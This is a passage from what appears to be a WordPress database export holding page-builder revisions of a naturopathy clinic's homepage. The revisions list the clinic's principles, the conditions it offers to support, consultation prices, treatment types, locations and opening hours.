normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2022-01-21 12:18:16','2022-01-21 04:18:16','',28,'https://verdenaturopathy.com.au/?p=370',0,'revision','',0),(367,1,'2021-12-06 13:51:58','2021-12-06 05:51:58','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $130\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 8.15am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-12-06 13:51:58','2021-12-06 05:51:58','',28,'https://verdenaturopathy.com.au/?p=367',0,'revision','',0),(366,1,'2021-12-06 13:49:56','2021-12-06 05:49:56','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: 